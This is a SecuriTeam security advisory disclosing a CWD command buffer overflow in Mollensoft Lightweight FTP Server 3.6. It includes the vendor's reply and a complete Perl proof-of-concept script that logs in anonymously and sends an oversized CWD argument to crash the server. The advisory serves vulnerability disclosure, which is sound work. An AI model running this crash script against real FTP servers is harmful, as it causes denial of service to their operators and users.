mollensoftLightweight.txt

`Mollensoft Lightweight FTP Server CWD Buffer Overflow   
------------------------------------------------------------------------   
  
  
Article reference:  
http://www.securiteam.com/windowsntfocus/5RP0L15CUM.html  
  
  
SUMMARY  
  
STORM has discovered a security vulnerability in   
<http://www.mollensoft.com/product2.htm> Mollensoft Lightweight FTP Server.   
Mollensoft Lightweight FTP Server's support for the CWD command incorrectly   
verifies that the buffer the CWD command doesn't overflow any of its internal   
buffers. This insufficient verification allows an authenticated (anonymous or   
otherwise) user to cause the FTP server to crash while trying to read an   
arbitrary memory location by issuing a malformed CWD command.   
  
  
DETAILS  
  
Vulnerable Systems:   
* Mollensoft Lightweight FTP Server version 3.6   
  
Vendor Response:   
BigAl (author) responded with the following:   
I wrote this particular app with Visual Basic and used an FTP ActiveX COM   
component and I am waiting for the component creator to get back to me   
regarding the fix. Unfortunately I cannot snip off any of the commands, as   
access to the command length is not available from the VB component using   
straight VB Code. I am working on moving to .Net so hopefully I can have a   
new FTP server out by fall time frame which is truly multi-threaded and   
totally coded by me.   
  
Exploit:   
#!/usr/bin/perl   
#   
# Mollensoft FTP Server CMD Buffer Overflow   
#   
# Orkut users? Come join the SecuriTeam community   
# http://www.orkut.com/Community.aspx?cmm=44441   
  
use strict;   
use IO::Socket::INET;   
  
usage() unless (@ARGV == 2);   
  
my $host = shift(@ARGV);   
my $port = shift(@ARGV);   
  
# create the socket   
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,   
PeerPort=>$port);   
$socket or die "Cannot connect to host!\n";   
  
$socket->autoflush(1);   
  
# receive greeting   
my $repcode = "220 ";   
my $response = recv_reply($socket, $repcode);   
print $response;   
  
# send USER command   
#my $username = "%00" x 2041;   
my $username = "anonymous";   
print "USER $username\r\n";   
print $socket "USER $username\r\n";   
  
select(undef, undef, undef, 0.002); # sleep of 2 milliseconds   
  
# send PASS command   
my $password = "a\@b.com";   
print "PASS $password\r\n";   
print $socket "PASS $password\r\n";   
  
my $cmd = "CWD ";   
$cmd .= "A" x 224; # Value can range from 224 to 1018   
$cmd .= "\r\n";   
print "length: ".length($cmd)."\n";   
print $socket $cmd;   
  
$repcode = "";   
recv_reply($socket, $repcode);   
  
close($socket);   
exit(0);   
  
sub usage   
{   
# print usage information   
print "\nUsage: Mollensoft_FTP_Server_crash.pl <host> <port>\n   
<host> - The host to connect to   
<port> - The TCP port which WarFTP is listening on\n\n";   
exit(1);   
}   
  
sub recv_reply   
{   
# retrieve any reply   
my $socket = shift;   
my $repcode = shift;   
$socket or die "Can't receive on socket\n";   
  
my $res="";   
while(<$socket>)   
{   
$res .= $_;   
if (/$repcode/) { last; }   
}   
return $res;   
}   
  
  
ADDITIONAL INFORMATION  
SecurITeam would like to thank <mailto:[email protected]> STORM for   
finding this vulnerability.  
  
  
Regards,   
Aviram Jenik  
Beyond Security Ltd.  
  
http://www.BeyondSecurity.com  
http://www.SecuriTeam.com  
  
The First Integrated Network and Web Application Vulnerability Scanner:  
http://www.beyondsecurity.com/webscan-wp.pdf  
  
  
  
  
====================   
====================   
  
DISCLAIMER:   
The information in this bulletin is provided "AS IS" without warranty of any   
kind.   
In no event shall we be liable for any damages whatsoever including direct,   
indirect, incidental, consequential, loss of business profits or special   
damages.   
`